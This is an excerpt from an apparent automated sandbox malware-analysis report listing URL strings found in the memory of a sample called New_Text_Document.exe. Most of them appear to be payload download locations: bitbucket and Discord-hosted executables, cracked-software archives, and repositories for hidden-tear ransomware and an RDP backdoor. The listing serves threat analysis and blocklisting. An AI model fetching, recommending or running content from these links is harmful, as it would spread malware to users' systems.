                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/thisisaworkspace/bumogak/raw/cf339d8869a4980f17da4d2a7ca92d4cd8dfa47b/DEV.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/thisisaworkspace/bumogak/raw/cf339d8869a4980f17da4d2a7ca92d4cd8dfa47b/LEMON.ex
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/thisisaworkspace/bumogak/raw/cf339d8869a4980f17da4d2a7ca92d4cd8dfa47b/LK2.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/thisisaworkspace/privateonlydontdownl/raw/4446563bb6b1231f9c6330d35abea72c375d
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/thisisaworkspace/privateonlydontdownl/raw/50a85cc70c10cc8c1a49965dac08f9109dc0
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/valentinomaseratti/symphitems/downloads/Passw_items_ApplicationSetupFile14.1.r
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/wfwfwe2/2/downloads/SoftInstall.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/workker300066/partners/downloads/Project_8.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/worldofsoft1/soft/downloads/Soft.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/zesoftwares/zesoft/downloads/ZeSoftApp.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bluechipfx.com/ir/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bluskyglobal.com/nvis/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bluskyglobal.com/olou/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bontiakhotel.net/article/Vpeswawqko.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.ttc.edu.sg/qai/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://boolimagens.com.br/eu/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://brand20creatives.com/mr/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://burgerbuddy.in/qui/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://buscascolegios.diit.cl/txs9e9.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://buypropertyinuae.com/.M1.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://buypropertyinuae.com/.N1.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://buypropertyinuae.com/.O1.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cargoconnect.online/LFeuP15.pfm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://carrepairdubai.ae/usra/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.000000000347B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.000000000347B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1162840103530528921/1164891114868834355/setup.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1163975089872711693/1163975336279670855/PlanetsTherapy.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1165755308375810254/1166519315495927878/EnGzwNkORZwHTpBAc1.bi
                    Source: raserver.exe, 00000014.00000003.1555128437.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.pixelbin.io/v2/long-glade-33dc08/original/rump_img.jpeg
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.unduhfile.my.id/aimgod_1.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.unduhfile.my.id/golden_1.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cecan.org.br/aest/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cfu.twr.mybluehost.me/agenzia/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cfu.twr.mybluehost.me/connect/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cfu.twr.mybluehost.me/scarica/
                    Source: raserver.exe, 00000014.00000003.1555128437.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: raserver.exe, 00000014.00000003.1555128437.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chaalakya.com/tmt/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chuckozeas.com/pdf/PO_8016992470_Copy.7z
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cipro.mx/prensa/XlJCUmSGPFm3bAAIvz/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clinichealth.com.br/evi/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudk.click/ie/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://coalizaobrasil.com.br/ete/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://codeload.github.com/JackElfa/AppUnlim/zip/refs/heads/main
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://codeload.github.com/MeteorAdminz/hidden-tear/zip/master
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://codeload.github.com/UnlockTeame/Unlimited/zip/refs/heads/main
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://codeload.github.com/jessica360k/LitPay/zip/refs/heads/main
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://codeload.github.com/mr-r3b00t/RDP_Backdoor/zip/refs/heads/main
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://colegiojuanbernardone.com/wp-admin/user/setup.7z
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://colegiosanbenigno.cl/nsat/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://colegiosembrador.cl/tvuo/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://comoinvertir.co/sa/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://comoinvertir.pe/sspe/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://compan.oss-cn-hongkong.aliyuncs.com/photoback
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://convergentcapital.com.au/isnb/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://corpolevesuplementos.com.br/2022pws/assdirect.html
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://corpolevesuplementos.com.br/nyan.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://corsyne.com/wp-content/soft/Setup_pass1234.7z
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cpabulld.com/eua/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crackload.net/download/EFT%20Dongle%204.1%20Crack%20Without%20Box%20
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crackload.net/download/ElcomSoft%20iOS%20Forensic%20Toolkit%207.0.313%20Crack%20%20%20Torren
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crackload.net/download/Euro%20Truck%20Simulator%202%20v1.40.5.0s%20Crack%20%20%20Torrent%20(
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crackload.net/download/Football%20Manager%202022%20Crack%20%20%20Torrent%20(APK)%20PC%20Down
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crackload.net/download/Just%20Cause%204%20v1.0%20Crack%20%20Downloader.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crackload.net/download/ProtonVPN%202.4.31%20Crack%20%20%20Full%20Working%20License%20Key%20D
                    Source: raserver.exe, 00000014.00000003.1558158883.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000014.00000003.1609490585.0000000008361000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
